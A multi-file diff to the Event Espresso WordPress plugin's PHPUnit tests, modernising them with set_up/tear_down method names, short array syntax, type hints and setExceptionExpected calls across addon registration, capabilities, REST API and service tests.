@@ -33,10 +29,10 @@ class EE_Register_Addon_Test extends EE_UnitTestCase
      * @param array  $data
      * @param string $dataName
      */
-    public function __construct($name = null, array $data = array(), $dataName = '')
+    public function __construct($name = null, array $data = [], $dataName = '')
     {
         $this->_mock_addon_path = EE_MOCKS_DIR . 'addons/eea-new-addon/';
-        $this->_reg_args = array(
+        $this->_reg_args        = [
             'version'               => '1.0.0',
             'min_core_version'      => '4.0.0',
             'main_file_path'        => $this->_mock_addon_path . 'eea-new-addon.php',
@@ -45,11 +41,10 @@ class EE_Register_Addon_Test extends EE_UnitTestCase
             'class_paths'           => $this->_mock_addon_path . 'core/db_classes',
             'class_extension_paths' => $this->_mock_addon_path . 'core/db_class_extensions',
             'model_extension_paths' => $this->_mock_addon_path . 'core/db_model_extensions',
-        );
-        $this->_addon_name = 'New_Addon';
+        ];
+        $this->_addon_name      = 'New_Addon';
         parent::__construct($name, $data, $dataName);
     }
-
 
 
     public function set_up()
@@ -57,7 +52,7 @@ class EE_Register_Addon_Test extends EE_UnitTestCase
         parent::set_up();
         add_filter(
             'FHEE__EEH_Activation__create_table__short_circuit',
-            array($this, 'dont_short_circuit_new_addon_table'),
+            [$this, 'dont_short_circuit_new_addon_table'],
             20,
             3
         );
@@ -70,20 +65,25 @@ class EE_Register_Addon_Test extends EE_UnitTestCase
     }
 
 
-
     /**
-     * OK's the creation of the esp_new_addon table, because this hooks in AFTER EE_UNitTestCase's callback on this same hook
+     * OK's the creation of the esp_new_addon table, because this hooks in AFTER EE_UNitTestCase's callback on this
+     * same hook
      *
      * @param bool   $short_circuit
      * @param string $table_name
      * @param string $create_sql
      * @return boolean
+     * @throws EE_Error
+     * @throws ReflectionException
      */
-    public function dont_short_circuit_new_addon_table($short_circuit = false, $table_name = '', $create_sql = '')
-    {
-        $table_analysis = EE_Registry::instance()->create('TableAnalysis', array(), true);
+    public function dont_short_circuit_new_addon_table(
+        bool $short_circuit = false,
+        string $table_name = '',
+        string $create_sql = ''
+    ): bool {
+        $table_analysis = EE_Registry::instance()->create('TableAnalysis', [], true);
         if (
-            in_array($table_name, array('esp_new_addon_thing', 'esp_new_addon_attendee_meta'), true)
+            in_array($table_name, ['esp_new_addon_thing', 'esp_new_addon_attendee_meta'], true)
             && ! $table_analysis->tableExists($table_name)
         ) {
             // echo "\r\n\r\nDONT short circuit $sql";
@@ -95,8 +95,11 @@ class EE_Register_Addon_Test extends EE_UnitTestCase
     }
 
 
-
-    // test registering a bare minimum addon, and then de-registering it
+    /**
+     * test registering a bare minimum addon, and then de-registering it
+     *
+     * @throws EE_Error
+     */
     public function test_register_mock_addon_fail()
     {
         $this->assertEquals(0, did_action('activate_plugin'));
@@ -107,7 +110,7 @@ class EE_Register_Addon_Test extends EE_UnitTestCase
         try {
             $registered = EE_Register_Addon::register($this->_addon_name, $this->_reg_args);
             $this->fail('We should have had a warning saying that we are setting up the ee addon at the wrong time');
-        } catch (PHPUnit_Framework_Error_Notice $e) {
+        } catch (PHPUnit\Framework\Error\Notice $e) {
             $registered = false;
         }
         $this->assertFalse($registered);
@@ -123,7 +126,9 @@ class EE_Register_Addon_Test extends EE_UnitTestCase
     }
 
 
-
+    /**
+     * @throws EE_Error
+     */
     public function test_register_mock_addon_fail__bad_parameters()
     {
         // we're registering the addon at the right time but with the wrong parameters
@@ -134,11 +139,11 @@ class EE_Register_Addon_Test extends EE_UnitTestCase
         try {
             $registered = EE_Register_Addon::register(
                 $this->_addon_name,
-                array(
-                	'version'          => '1.0.0',
-                	'min_core_version' => '4.0.0',
-                	'dms_paths'        => $this->_mock_addon_path . 'core/data_migration_scripts',
-            	)
+                [
+                    'version'          => '1.0.0',
+                    'min_core_version' => '4.0.0',
+                    'dms_paths'        => $this->_mock_addon_path . 'core/data_migration_scripts',
+                ]
             );
             $this->fail(
                 'We should have received a warning that the "main_file_path" is a required argument when registering an addon'
@@ -155,12 +160,15 @@ class EE_Register_Addon_Test extends EE_UnitTestCase
         //check DMSs weren't setup either
         $DMSs_available = EE_Data_Migration_Manager::reset()->get_all_data_migration_scripts_available();
         $this->assertArrayNotHasKey('EE_DMS_New_Addon_1_0_0', $DMSs_available);
-        //check that we didn't register the addon's de-activaiton hook either
+        //check that we didn't register the addon's de-activation hook either
         $this->assertFalse(has_action('deactivate_' . plugin_basename($this->_reg_args['main_file_path'])));
     }
 
 
-
+    /**
+     * @throws EE_Error
+     * @throws ReflectionException
+     */
     public function test_register_mock_addon_success()
     {
         //ensure model and class extensions weren't setup beforehand
@@ -208,13 +216,13 @@ class EE_Register_Addon_Test extends EE_UnitTestCase
         //check that the caps maps were registered properly too
         $this->_pretend_capabilities_registered();
         $current_user = $this->factory->user->create_and_get();
-        $other_user = $this->factory->user->create_and_get();
+        $other_user   = $this->factory->user->create_and_get();
         //give user administrator role for test!
         $current_user->add_role(EE_Capabilities::ROLE_ADMINISTRATOR);
-        $a_thing = $this->new_model_obj_with_dependencies('New_Addon_Thing', array('NEW_wp_user' => $current_user->ID));
+        $a_thing      = $this->new_model_obj_with_dependencies('New_Addon_Thing', ['NEW_wp_user' => $current_user->ID]);
         $others_thing = $this->new_model_obj_with_dependencies(
-        	'New_Addon_Thing',
-        	array('NEW_wp_user' => $other_user->ID)
+            'New_Addon_Thing',
+            ['NEW_wp_user' => $other_user->ID]
         );
         $this->assertTrue(
             EE_Capabilities::instance()->user_can($current_user, 'edit_thing', 'testing_edit', $a_thing->ID())
@@ -238,7 +246,7 @@ class EE_Register_Addon_Test extends EE_UnitTestCase
         EE_Registry::instance()->load_core('Capabilities');
         EE_Capabilities::instance()->init_caps(true);
         //validate caps were registered and init saved.
-        $admin_caps_init = EE_Capabilities::instance()->get_ee_capabilities(EE_Capabilities::ROLE_ADMINISTRATOR);
+        $admin_caps_init = EE_Capabilities::instance()->get_ee_capabilities();
         $this->assertArrayContains('edit_thing', $admin_caps_init);
         //verify new caps are in the role
         $role = get_role(EE_Capabilities::ROLE_ADMINISTRATOR);
@@ -302,7 +310,7 @@ class EE_Register_Addon_Test extends EE_UnitTestCase
      * action fired, that there are no errors and the 2nd addon's activation indicator
      * was set properly
      *
-     * @throws \EE_Error
+     * @throws EE_Error
      */
     public function test_register_mock_addon__activation()
     {
@@ -321,13 +329,12 @@ class EE_Register_Addon_Test extends EE_UnitTestCase
     }
 
 
-
     /**
      * registers an addon as usual, but then calls 'activate_plugin', as if a different
      * addon had been activated. Because the register method is called twice, this has the potential
      * for problems
      *
-     * @throws \EE_Error
+     * @throws EE_Error
      */
     public function test_register_addon_called_twice_on_activation()
     {
@@ -349,14 +356,17 @@ class EE_Register_Addon_Test extends EE_UnitTestCase
     }
 
 
-
+    /**
+     * @throws EE_Error
+     * @throws ReflectionException
+     */
     public function tear_down()
     {
         if (isset($this->_addon_name, EE_Registry::instance()->addons->EE_New_Addon)) {
             $main_file_path_before_deregistration = EE_Registry::instance()
-            										->addons
-            										->EE_New_Addon
-            										->get_main_plugin_file_basename();
+                ->addons
+                ->EE_New_Addon
+                ->get_main_plugin_file_basename();
             EE_Register_Addon::deregister($this->_addon_name);
             $this->assertFalse(isset(EE_Registry::instance()->addons->EE_New_Addon));
             //verify the de-activation hook was removed
@@ -400,12 +410,10 @@ class EE_Register_Addon_Test extends EE_UnitTestCase
     }
 
 
-
     protected function _pretend_after_plugin_activation()
     {
         do_action('activate_plugin');
     }
-
 
 
     protected function _pretend_addon_hook_time()
@@ -422,15 +430,14 @@ class EE_Register_Addon_Test extends EE_UnitTestCase
     }
 
 
-
     /**
      * Determines if the attendee class has been extended by teh mock extension
      *
      * @param bool $throw_error
      * @return bool
-     * @throws \EE_Error
+     * @throws EE_Error
      */
-    private function _class_has_been_extended($throw_error = false)
+    private function _class_has_been_extended(bool $throw_error = false): bool
     {
         try {
             $a = EE_Attendee::new_instance();
@@ -445,15 +452,15 @@ class EE_Register_Addon_Test extends EE_UnitTestCase
     }
 
 
-
     /**
      * Determines if the Attendee model has been extended by the mock extension
      *
      * @param bool $throw_error
      * @return bool
-     * @throws \EE_Error
+     * @throws EE_Error
+     * @throws ReflectionException
      */
-    private function _model_has_been_extended($throw_error = false)
+    private function _model_has_been_extended(bool $throw_error = false): bool
     {
         try {
             /** @var EEM_Attendee $att */
@@ -465,7 +472,8 @@ class EE_Register_Addon_Test extends EE_UnitTestCase
                             esc_html__(
                                 'The field ATT_foobar is not on EEM_Attendee, but the extension should have added it. fields are: %s',
                                 'event_espresso'
-                            ), implode(",", array_keys(EEM_Attendee::instance()->field_settings()))
+                            ),
+                            implode(",", array_keys(EEM_Attendee::instance()->field_settings()))
                         )
                     );
                 }
@@ -478,7 +486,8 @@ class EE_Register_Addon_Test extends EE_UnitTestCase
                             esc_html__(
                                 'The relation of type New_Addon_Thing on EEM_Attendee, but the extension should have added it. fields are: %s',
                                 'event_espresso'
-                            ), implode(",", array_keys(EEM_Attendee::instance()->field_settings()))
+                            ),
+                            implode(",", array_keys(EEM_Attendee::instance()->field_settings()))
                         )
                     );
                 }
@@ -495,7 +504,9 @@ class EE_Register_Addon_Test extends EE_UnitTestCase
     }
 
 
-
+    /**
+     * @throws ReflectionException
+     */
     public function test_effective_version()
     {
         //use reflection to test this protected method
@@ -507,7 +518,9 @@ class EE_Register_Addon_Test extends EE_UnitTestCase
     }
 
 
-
+    /**
+     * @throws ReflectionException
+     */
     public function test_meets_min_core_version_requirement()
     {
         //use reflection to test this protected method
@@ -522,8 +535,5 @@ class EE_Register_Addon_Test extends EE_UnitTestCase
         $this->assertFalse($method->invoke(null, '4.4.0.p', '4.3.0.p'));
         $this->assertFalse($method->invoke(null, '4.3.0.rc.123', '4.3.0.rc.001'));
     }
-
 }
-
-// End of file EE_Register_Addon_Test.php
 // Location: testcases/core/libraries/plugin_api/EE_Register_Addon_Test.php

--- a/tests/testcases/core/libraries/plugin_api/EE_Register_Capabilities_Test.php
+++ b/tests/testcases/core/libraries/plugin_api/EE_Register_Capabilities_Test.php
@@ -37,9 +37,9 @@ class EE_Register_Capabilities_Test extends EE_UnitTestCase
      */
     protected $_meta_caps_before_registering_new_ones = array();
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $capabilities_array                         = array(
             'administrator' => array(
                 'test_reads',
@@ -400,9 +400,9 @@ class EE_Register_Capabilities_Test extends EE_UnitTestCase
             array($this, '_verify_new_meta_cap_ok_after_deregister'), 200);
     }
 
-    public function tearDown()
+    public function tear_down()
     {
         EE_Register_Capabilities::deregister('Test_Capabilities');
-        parent::tearDown();
+        parent::tear_down();
     }
 }

--- a/tests/testcases/core/libraries/plugin_api/EE_Register_Capabilities_Test.php
+++ b/tests/testcases/core/libraries/plugin_api/EE_Register_Capabilities_Test.php
@@ -41,7 +41,7 @@ class EE_Register_Capabilities_Test extends EE_UnitTestCase
     {
         parent::set_up();
         $capabilities_array                         = array(
-            'administrator' => array(
+            EE_Capabilities::ROLE_ADMINISTRATOR => array(
                 'test_reads',
                 'test_writes',
                 'test_others_read',
@@ -100,10 +100,10 @@ class EE_Register_Capabilities_Test extends EE_UnitTestCase
         $user_id     = $this->factory->user->create();
         $this->_user = $this->factory->user->get_object_by_id($user_id);
         //give user administrator role for test!
-        $this->_user->add_role('administrator');
+        $this->_user->add_role(EE_Capabilities::ROLE_ADMINISTRATOR);
 
         //verify administrator role set
-        $this->assertTrue(user_can($this->_user, 'administrator'));
+        $this->assertTrue(user_can($this->_user, EE_Capabilities::ROLE_ADMINISTRATOR));
     }
 
 
@@ -130,16 +130,23 @@ class EE_Register_Capabilities_Test extends EE_UnitTestCase
         //remove filters that were added to prevent pollution in other tests
         $this->_remove_test_helper_filters();
         //validate caps were registered and init saved.
-        $admin_caps_init = EE_Capabilities::instance()->get_ee_capabilities('administrator');
+        $admin_caps_init = EE_Capabilities::instance()->get_ee_capabilities(EE_Capabilities::ROLE_ADMINISTRATOR);
         $this->assertArrayContains('test_reads', $admin_caps_init);
 
         //verify new caps are in the role
-        $role = get_role('administrator');
-        $this->assertContains($this->_valid_capabilities['capabilities']['administrator'], $role->capabilities);
+        $role = get_role(EE_Capabilities::ROLE_ADMINISTRATOR);
+        foreach ($this->_valid_capabilities['capabilities'][ EE_Capabilities::ROLE_ADMINISTRATOR ] as $capability) {
+            $this->assertArrayHasKey($capability, $role->capabilities);
+        }
 
         //make sure we didn't erase the existing capabilities (@see https://events.codebasehq.com/projects/event-espresso/tickets/6700)
-        $this->assertContains(array('ee_read_ee', 'ee_read_events'), $role->capabilities,
-            'Looks like registering capabilities is overwriting default capabilites, that will cause problems');
+        $this->assertTrue(
+            ! array_diff(
+                ['ee_read_ee' => true, 'ee_read_events' => true],
+                $role->capabilities
+            ),
+            'Looks like registering capabilities is overwriting default capabilites, that will cause problems'
+        );
 
         //setup user
         $this->setupUser();
@@ -229,8 +236,8 @@ class EE_Register_Capabilities_Test extends EE_UnitTestCase
      */
     public function _verify_new_cap_map_ok_after_deregister($incoming_cap_map)
     {
-        $this->assertNotContains($this->_valid_capabilities['capabilities']['administrator'],
-            $incoming_cap_map['administrator']);
+        $this->assertNotContains($this->_valid_capabilities['capabilities'][EE_Capabilities::ROLE_ADMINISTRATOR],
+            $incoming_cap_map[EE_Capabilities::ROLE_ADMINISTRATOR]);
         return $incoming_cap_map;
     }
 

--- a/tests/testcases/core/libraries/plugin_api/EE_Register_Model_Extensions_Test.php
+++ b/tests/testcases/core/libraries/plugin_api/EE_Register_Model_Extensions_Test.php
@@ -156,8 +156,8 @@ class EE_Register_Model_Extensions_Test extends EE_UnitTestCase{
 		EE_Registry::instance()->load_model('Attendee')->get_all();
 
 	}
-	public function setUp(){
-		parent::setUp();
+	public function set_up(){
+		parent::set_up();
 		//whitelist the table we're about to add
 		add_filter( 'FHEE__EEH_Activation__create_table__short_circuit', array($this, 'dont_short_circuit_mock_table' ), 25, 3 );
 		//add table from related DMS
@@ -193,11 +193,11 @@ class EE_Register_Model_Extensions_Test extends EE_UnitTestCase{
 			return $short_circuit;
 		}
 	}
-	public function tearDown(){
+	public function tear_down(){
 		//ensure the models aren't stil registered. they should have either been
 		//deregistered during the test, or not been registered at all
 		$this->_stop_pretending_addon_hook_time();
-		parent::tearDown();
+		parent::tear_down();
 	}
 }
 

--- a/tests/testcases/core/libraries/plugin_api/EE_Register_Model_Test.php
+++ b/tests/testcases/core/libraries/plugin_api/EE_Register_Model_Test.php
@@ -37,9 +37,9 @@ class EE_Register_Model_Test extends EE_UnitTestCase
 
 
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->_stop_pretending_addon_hook_time();
         //		EE_System::instance()->load_core_configuration();
     }
@@ -109,14 +109,14 @@ class EE_Register_Model_Test extends EE_UnitTestCase
 
 
 
-    public function tearDown()
+    public function tear_down()
     {
         //ensure the models aren't stil registered. they should have either been
         //deregistered during the test, or not been registered at all
         $this->assertArrayDoesNotContain('EEM_Mock', EE_Registry::instance()->non_abstract_db_models);
         $this->assertArrayDoesNotContain('EEM_Mock', EE_Registry::instance()->models);
         $this->_stop_pretending_addon_hook_time();
-        parent::tearDown();
+        parent::tear_down();
     }
 }
 

--- a/tests/testcases/core/libraries/plugin_api/EE_Register_Payment_Method_Test.php
+++ b/tests/testcases/core/libraries/plugin_api/EE_Register_Payment_Method_Test.php
@@ -20,9 +20,9 @@ class EE_Register_Payment_Method_Test extends EE_UnitTestCase
     protected $payment_method_manager;
 
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->_pmt_args = array(
             'payment_method_paths' =>
                 array(
@@ -34,9 +34,9 @@ class EE_Register_Payment_Method_Test extends EE_UnitTestCase
     }
 
 
-    public function tearDown()
+    public function tear_down()
     {
-        parent::tearDown();
+        parent::tear_down();
         $this->_pmt_args = null;
         $this->_pmt_name = null;
         $this->payment_method_manager = null;

--- a/tests/testcases/core/libraries/plugin_api/EE_Register_Payment_Method_Test.php
+++ b/tests/testcases/core/libraries/plugin_api/EE_Register_Payment_Method_Test.php
@@ -2,7 +2,6 @@
 
 use EventEspresso\core\services\loaders\LoaderFactory;
 
-
 /**
  * @group core/libraries/plugin_api
  * @group core
@@ -12,6 +11,7 @@ use EventEspresso\core\services\loaders\LoaderFactory;
 class EE_Register_Payment_Method_Test extends EE_UnitTestCase
 {
     protected $_pmt_name;
+
     protected $_pmt_args;
 
     /**
@@ -23,13 +23,13 @@ class EE_Register_Payment_Method_Test extends EE_UnitTestCase
     public function set_up()
     {
         parent::set_up();
-        $this->_pmt_args = array(
+        $this->_pmt_args              = [
             'payment_method_paths' =>
-                array(
+                [
                     EE_TESTS_DIR . 'mocks/payment_methods/Mock_Onsite',
-                ),
-        );
-        $this->_pmt_name = 'Mock_Onsite';
+                ],
+        ];
+        $this->_pmt_name              = 'Mock_Onsite';
         $this->payment_method_manager = LoaderFactory::getLoader()->getShared('EE_Payment_Method_Manager');
     }
 
@@ -37,11 +37,15 @@ class EE_Register_Payment_Method_Test extends EE_UnitTestCase
     public function tear_down()
     {
         parent::tear_down();
-        $this->_pmt_args = null;
-        $this->_pmt_name = null;
+        $this->_pmt_args              = null;
+        $this->_pmt_name              = null;
         $this->payment_method_manager = null;
     }
 
+
+    /**
+     * @throws EE_Error
+     */
     public function test_register__fail()
     {
         $this->_stop_pretending_addon_hook_time();
@@ -54,12 +58,18 @@ class EE_Register_Payment_Method_Test extends EE_UnitTestCase
         //try registering at wrong time
         try {
             EE_Register_Payment_Method::register($this->_pmt_name, $this->_pmt_args);
-            $this->fail('We should have had a warning saying that we are setting up the payment methods at the wrong time');
-        } catch (PHPUnit_Framework_Error_Notice $e) {
+            $this->fail(
+                'We should have had a warning saying that we are setting up the payment methods at the wrong time'
+            );
+        } catch (PHPUnit\Framework\Error\Notice $e) {
             $this->assertTrue(true);
         }
     }
 
+
+    /**
+     * @throws EE_Error
+     */
     public function test_register__success()
     {
         $this->_pretend_addon_hook_time();
@@ -69,7 +79,6 @@ class EE_Register_Payment_Method_Test extends EE_UnitTestCase
         //first verify it doesn't already exists
         $pmt_exists = $this->payment_method_manager->payment_method_type_exists($this->_pmt_name);
         $this->assertFalse($pmt_exists);
-
 
         EE_Register_Payment_Method::register($this->_pmt_name, $this->_pmt_args);
         //now check it does exist

--- a/tests/testcases/core/libraries/rest_api/Capabilities_Test.php
+++ b/tests/testcases/core/libraries/rest_api/Capabilities_Test.php
@@ -15,8 +15,8 @@ if ( !defined( 'EVENT_ESPRESSO_VERSION' ) ) {
  *
  */
 class Capabilities_Test extends \EE_UnitTestCase{
-	function setUp(){
-		parent::setUp();
+	function set_up(){
+		parent::set_up();
 		add_filter( 'FHEE__EE_REST_API_Controller_Model_Read__get_permissions', array( $this, 'set_some_restrictions_for_tests', ) );
 		if ( ! class_exists( 'WP_Rest_Request' ) ) {
 			$this->markTestSkipped(

--- a/tests/testcases/core/libraries/rest_api/ModelDataTranslatorTest.php
+++ b/tests/testcases/core/libraries/rest_api/ModelDataTranslatorTest.php
@@ -80,7 +80,6 @@ class ModelDataTranslatorTest extends EE_REST_TestCase
 
     /**
      * @dataProvider invalidTimestampDataProvider
-     * @expectedException EventEspresso\core\libraries\rest_api\RestException
      * @expectedExceptionCode 400
      * @throws DomainException
      * @throws EE_Error
@@ -91,6 +90,7 @@ class ModelDataTranslatorTest extends EE_REST_TestCase
      */
     public function testIncomingInvalidTimestamp($timestamp, $timezone)
     {
+        $this->setExceptionExpected('EventEspresso\core\libraries\rest_api\RestException');
         ModelDataTranslator::prepareFieldValueFromJson(
             new EE_Datetime_Field(
                 'post_date',
@@ -344,7 +344,6 @@ class ModelDataTranslatorTest extends EE_REST_TestCase
 
     /**
      * @dataProvider dataProviderForTestPrepareFieldValueFromJsonBad
-     * @expectedException EventEspresso\core\libraries\rest_api\RestException
      * @param mixed $expected_result
      * @param mixed $inputted_json_value
      * @param EE_Model_Field_Base $field_obj
@@ -352,6 +351,7 @@ class ModelDataTranslatorTest extends EE_REST_TestCase
      */
     public function testPrepareFieldValueFromJsonBad($inputted_json_value, EE_Model_Field_Base $field_obj)
     {
+        $this->setExceptionExpected('EventEspresso\core\libraries\rest_api\RestException');
         //ok duck and cover! It's gonna blow!
         ModelDataTranslator::prepareFieldValueFromJson($field_obj, $inputted_json_value, '4.8.36');
     }
@@ -741,10 +741,10 @@ class ModelDataTranslatorTest extends EE_REST_TestCase
      * @param boolean $writing
      * @group        9222
      * @dataProvider dataProviderForTestPrepareConditionsQueryParamsForModelsBad
-     * @expectedException EventEspresso\core\libraries\rest_api\RestException
      */
     public function testPrepareConditionsQueryParamsForModelsBad($input, $model_name, $writing)
     {
+        $this->setExceptionExpected('EventEspresso\core\libraries\rest_api\RestException');
         $model = EE_Registry::instance()->load_model($model_name);
         //run for cover! it's going to error!
         ModelDataTranslator::prepareConditionsQueryParamsForModels(

--- a/tests/testcases/core/libraries/rest_api/Model_Version_Info_Test.php
+++ b/tests/testcases/core/libraries/rest_api/Model_Version_Info_Test.php
@@ -18,8 +18,8 @@ if ( !defined( 'EVENT_ESPRESSO_VERSION' ) ) {
  */
 class Model_Version_Info_Test extends \EE_UnitTestCase{
 	
-	public function setUp() {
-		parent::setUp();
+	public function set_up() {
+		parent::set_up();
 		if ( ! class_exists( 'WP_Rest_Request' ) ) {
 			$this->markTestSkipped(
 				'Test being run on a version of WP that does not have the REST framework installed'

--- a/tests/testcases/core/libraries/rest_api/controllers/Checkin_Test.php
+++ b/tests/testcases/core/libraries/rest_api/controllers/Checkin_Test.php
@@ -21,9 +21,9 @@ class Checkin_Test extends EE_UnitTestCase
      * @throws Exception
      * @since $VID:$
      */
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         if (! class_exists('WP_Rest_Request')) {
             $this->markTestSkipped(
                 'Test being run on a version of WP that does not have the REST framework installed'
@@ -40,10 +40,10 @@ class Checkin_Test extends EE_UnitTestCase
      *
      * @since $VID:$
      */
-    public function tearDown()
+    public function tear_down()
     {
         EE_Error::reset_notices();
-        parent::tearDown();
+        parent::tear_down();
     }
 
 

--- a/tests/testcases/core/libraries/shortcodes/EE_Shortcodes_Test.php
+++ b/tests/testcases/core/libraries/shortcodes/EE_Shortcodes_Test.php
@@ -17,9 +17,9 @@ class EE_Shortcodes_Test extends EE_UnitTestCase
     protected $shortcode_mock;
 
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         require_once EE_TESTS_DIR . 'mocks/core/libraries/shortcodes/EE_Shortcodes_Mock.php';
         $this->shortcode_mock = new EE_Shortcodes_Mock;
     }

--- a/tests/testcases/core/libraries/shortcodes/VenueShortcodesTest.php
+++ b/tests/testcases/core/libraries/shortcodes/VenueShortcodesTest.php
@@ -21,16 +21,16 @@ class VenueShortcodesTest extends EE_UnitTestCase
     protected $parser;
 
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->parser = new EE_Venue_Shortcodes();
     }
 
 
-    public function tearDown()
+    public function tear_down()
     {
-        parent::tearDown();
+        parent::tear_down();
         $this->parser = null;
     }
 

--- a/tests/testcases/core/services/assets/RegistryTest.php
+++ b/tests/testcases/core/services/assets/RegistryTest.php
@@ -85,31 +85,27 @@ class RegistryTest extends EE_UnitTestCase
     }
 
 
-    /**
-     * @expectedException InvalidArgumentException
-     */
     public function test_addData_no_overwrite_array()
     {
+        $this->setExceptionExpected(InvalidArgumentException::class);
         $this->registry->addData('test', array('initial_value'));
         $this->registry->addData('test', array('another_value'));
     }
 
 
-    /**
-     * @expectedException InvalidArgumentException
-     */
     public function test_addData_no_overwrite_scalar()
     {
+        $this->setExceptionExpected(InvalidArgumentException::class);
         $this->registry->addData('test', 'initial_value');
         $this->registry->addData('test', 'cause_exception');
     }
 
 	/**
-     * @expectedException InvalidArgumentException
      * @group 10304
      */
     public function test_addTemplate_no_overwrite()
     {
+        $this->setExceptionExpected(InvalidArgumentException::class);
         $this->registry->addTemplate('test', 'some_test_content');
         $this->registry->addTemplate('test', 'cause exception');
     }
@@ -135,7 +131,7 @@ class RegistryTest extends EE_UnitTestCase
     public function testPushDataWithArrayAddingData()
     {
         foreach ($this->pushDataWithArrayProvider() as $test_description => $test_data) {
-            list($key, $value, $expected) = $test_data;
+            [$key, $value, $expected] = $test_data;
             $this->registry->pushData($key, $value);
             $this->assertEquals($expected, $this->registry->getData($key), $test_description);
         }
@@ -143,10 +139,10 @@ class RegistryTest extends EE_UnitTestCase
 
 
     /**
-     * @expectedException InvalidArgumentException
      */
     public function testPushDataExceptionWhenExistingDataIsScalar()
     {
+        $this->setExceptionExpected(InvalidArgumentException::class);
         $this->registry->addData( 'test', 'foo' );
         $this->registry->pushData( 'test', 'bar' );
     }
@@ -166,7 +162,7 @@ class RegistryTest extends EE_UnitTestCase
     public function testPushDataWithAssociativeArray()
     {
         foreach ($this->pushDataWithAssociativeArrayProvider() as $test_description => $test_data) {
-            list($key, $value, $expected) = $test_data;
+            [$key, $value, $expected] = $test_data;
             $this->registry->pushData($key, $value);
             $this->assertEquals($expected, $this->registry->getData($key), $test_description);
         }

--- a/tests/testcases/core/services/assets/RegistryTest.php
+++ b/tests/testcases/core/services/assets/RegistryTest.php
@@ -38,7 +38,7 @@ class RegistryTest extends EE_UnitTestCase
      * @throws InvalidFilePathException
      * @throws InvalidInterfaceException
      */
-    public function setUp()
+    public function set_up()
     {
         add_filter('FHEE__EventEspresso_core_services_assets_Registry__debug', '__return_true');
         $domain = DomainFactory::getShared(
@@ -52,13 +52,13 @@ class RegistryTest extends EE_UnitTestCase
         );
 
         $this->registry = new Registry(new AssetCollection(), new AssetManifest($domain));
-        parent::setUp();
+        parent::set_up();
     }
 
 
-    public function tearDown()
+    public function tear_down()
     {
-        parent::tearDown();
+        parent::tear_down();
         $this->registry = null;
     }
 

--- a/tests/testcases/core/services/cache/PostRelatedCacheManagerTest.php
+++ b/tests/testcases/core/services/cache/PostRelatedCacheManagerTest.php
@@ -27,9 +27,9 @@ class PostRelatedCacheManagerTest extends EE_UnitTestCase
 
 
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->cache_manager = new PostRelatedCacheManagerMock(
             new CacheStorageMock()
         );

--- a/tests/testcases/core/services/cache/TransientCacheStorageTest.php
+++ b/tests/testcases/core/services/cache/TransientCacheStorageTest.php
@@ -25,7 +25,7 @@ class TransientCacheStorageTest extends EE_UnitTestCase
 
 
 
-    public function setUp()
+    public function set_up()
     {
         // we only want our expirations to be 1 second in the future
         add_filter(
@@ -37,14 +37,14 @@ class TransientCacheStorageTest extends EE_UnitTestCase
             2
         );
         $this->cache_storage = new \EventEspresso\core\services\cache\TransientCacheStorage();
-        parent::setUp();
+        parent::set_up();
     }
 
 
 
-    public function tearDown()
+    public function tear_down()
     {
-        parent::tearDown();
+        parent::tear_down();
         $this->cache_storage = null;
     }
 

--- a/tests/testcases/core/services/collections/iterators/CollectionFilterCallbackIteratorTest.php
+++ b/tests/testcases/core/services/collections/iterators/CollectionFilterCallbackIteratorTest.php
@@ -22,17 +22,17 @@ class CollectionFilterCallbackIteratorTest extends EE_UnitTestCase
     private $loose_collection;
 
 
-    public function setUp()
+    public function set_up()
     {
         $this->loose_collection = new LooseCollection('');
-        parent::setUp();
+        parent::set_up();
     }
 
 
 
-    public function tearDown()
+    public function tear_down()
     {
-        parent::tearDown();
+        parent::tear_down();
         $this->loose_collection = null;
     }
 

--- a/tests/testcases/core/services/commands/CommandBusTest.php
+++ b/tests/testcases/core/services/commands/CommandBusTest.php
@@ -30,7 +30,7 @@ class CommandBusTest extends EE_UnitTestCase
 
 
 
-    public function setUp()
+    public function set_up()
     {
         EE_Dependency_Map::register_dependencies(
             'EventEspresso\tests\mocks\core\services\commands\CommandHandlerManagerMock',
@@ -42,7 +42,7 @@ class CommandBusTest extends EE_UnitTestCase
             'EventEspresso\tests\mocks\core\services\commands\CommandHandlerManagerMock',
             'EventEspresso\core\services\commands\CommandHandlerManagerInterface'
         );
-        parent::setUp();
+        parent::set_up();
     }
 
 

--- a/tests/testcases/core/services/commands/CommandHandlerManagerTest.php
+++ b/tests/testcases/core/services/commands/CommandHandlerManagerTest.php
@@ -28,13 +28,13 @@ class CommandHandlerManagerTest extends EE_UnitTestCase
     private $command_handler_manager;
 
 
-    public function setUp()
+    public function set_up()
     {
         EE_Dependency_Map::register_dependencies(
             'EventEspresso\tests\testcases\core\services\commands\ExtendedCommandHandlerManager',
             array('EventEspresso\core\services\loaders\Loader' => EE_Dependency_Map::load_from_cache,)
         );
-        parent::setUp();
+        parent::set_up();
         $this->command_handler_manager = EE_Registry::instance()->create(
             'EventEspresso\tests\testcases\core\services\commands\ExtendedCommandHandlerManager'
         );

--- a/tests/testcases/core/services/container/CoffeeShopTest.php
+++ b/tests/testcases/core/services/container/CoffeeShopTest.php
@@ -40,9 +40,9 @@ class CoffeeShopTest extends EE_UnitTestCase
     /**
      * setUp
      */
-    public function setUp()
+    public function set_up()
     {
-    	parent::setUp();
+    	parent::set_up();
         $this->markTestSkipped('CoffeeShop DI not implemented yet.');
         // instantiate the container
         $this->CoffeeShop = new CoffeeShop();

--- a/tests/testcases/core/services/context/ContextCheckerTest.php
+++ b/tests/testcases/core/services/context/ContextCheckerTest.php
@@ -27,9 +27,9 @@ class ContextCheckerTest extends EE_UnitTestCase
     private $acceptable_values = array('context-one', 'context-two');
 
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->context_checker = new ContextCheckerMock(
             'This-is-a-Test',
             $this->acceptable_values

--- a/tests/testcases/core/services/dependencies/DependencyResolverTest.php
+++ b/tests/testcases/core/services/dependencies/DependencyResolverTest.php
